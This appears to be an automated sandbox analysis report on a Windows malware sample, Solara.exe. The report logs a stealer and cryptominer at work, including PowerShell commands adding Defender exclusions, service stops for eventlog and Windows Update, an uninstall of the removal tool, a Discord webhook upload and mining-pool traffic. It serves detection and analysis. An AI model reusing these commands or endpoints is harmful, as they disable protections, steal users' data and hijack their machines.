                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", ProcessId: 4304, ProcessName: sc.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, ProcessId: 6648, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4864, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T07:10:50.120905+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.7 | 62230 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T07:10:24.458989+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.7 | 49857 | 80.240.16.67 | 443 | TCP

                AV Detection

                barindex
                Source: Solara.exe | Avira: detected
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe | Avira: detection malicious, Label: HEUR/AGEN.1306040
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Avira: detection malicious, Label: HEUR/AGEN.1306040
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe | ReversingLabs: Detection: 47%
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | ReversingLabs: Detection: 82%
                Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | ReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | ReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | ReversingLabs: Detection: 82%
                Source: Solara.exe | ReversingLabs: Detection: 71%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
                Source: Solara.exe | Joe Sandbox ML: detected

                Bitcoin Miner

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: conhost.exe | String found in binary or memory: cryptonight-monerov7
                Source: Solara.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Solara.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Exela.exe
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_N source: Exela.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AE992F0 FindFirstFileExW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AEB18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FF75AE992F0 FindFirstFileExW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 77_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                Source: Joe Sandbox View | IP Address: 208.95.112.1
                Source: unknown | DNS query: name: ip-api.com
                Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.7:62230 -> 1.1.1.1:53
                Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.7:49857 -> 80.240.16.67:443
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /getServer HTTP/1.1; Host: api.gofile.io; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Python/3.10 aiohttp/3.11.11
                Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1; Host: ip-api.com; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Python/3.10 aiohttp/3.11.11
                Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
                Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                Source: global traffic | DNS traffic detected: DNS query: discordapp.com
                Source: global traffic | DNS traffic detected: DNS query: api.gofile.io
                Source: global traffic | DNS traffic detected: DNS query: store1.gofile.io
                Source: unknownHTTP traffic detected: POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1Host: discordapp.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.11.11Content-Length: 1379
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Sun, 12 Jan 2025 06:11:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"X-Robots-Tag: noindex, nofollow
                Source: powershell.exe, 00000003.00000002.1458447080.000001F9EFBD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1674670295.0000025669D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                Source: powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: Exela.exeString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
                Source: powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LIJDSFKJZG.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\AQRFEVRTGL.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\HMPPSXQPQV.pdf

                System Summary

                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\System32\conhost.exe | Code function: 64_2_0000000140001394 NtOpenSection
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | File created: C:\Windows\TEMP\ypynqohyxqjk.sys
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_2244occl.ell.ps1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: String function: 00007FFB08152734 appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: String function: 00007FF75AE92710 appears 84 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: String function: 00007FFB08154057 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: String function: 00007FFB08151EF1 appears 182 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: String function: 00007FFB08152A04 appears 41 times
                Source: _overlapped.pyd.76.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: unicodedata.pyd.76.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: python3.dll.76.dr | Static PE information: No import functions for PE file found
                Source: Solara.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: libcrypto-1_1.dll.76.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
                Source: libssl-1_1.dll.76.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
                Source: python310.dll.76.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
                Source: sqlite3.dll.76.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
                Source: unicodedata.pyd.76.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
                Source: classification engine | Classification label: mal100.rans.troj.adwa.spyw.evad.mine.winEXE@155/141@5/7
                Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara.exe.log
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6904:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5836:120:WilError_03
                Source: C:\Users\user\Desktop\Solara.exeMutant created: \Sessions\1\BaseNamedObjects\iSwokMxIl2hScyvQj
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeMutant created: \Sessions\1\BaseNamedObjects\E
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1512:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\qdpnprrzvlcxaaqg
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4704:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4732:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6136:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6000:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1368:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5452:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
                Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\Solara.exe
                Source: Solara.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Solara.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Users\user\Desktop\Solara.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Solara.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Solara.exe | ReversingLabs: Detection: 71%
                Source: Exela.exe | String found in binary or memory: --help
                Source: Exela.exe | String found in binary or memory: can't send non-None value to a just-started generator
                Source: Exela.exe | String found in binary or memory: id-cmc-addExtensions
                Source: Exela.exe | String found in binary or memory: set-addPolicy
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile read: C:\Users\user\AppData\Local\Temp\Solara.exeJump to behavior
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown | Process created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
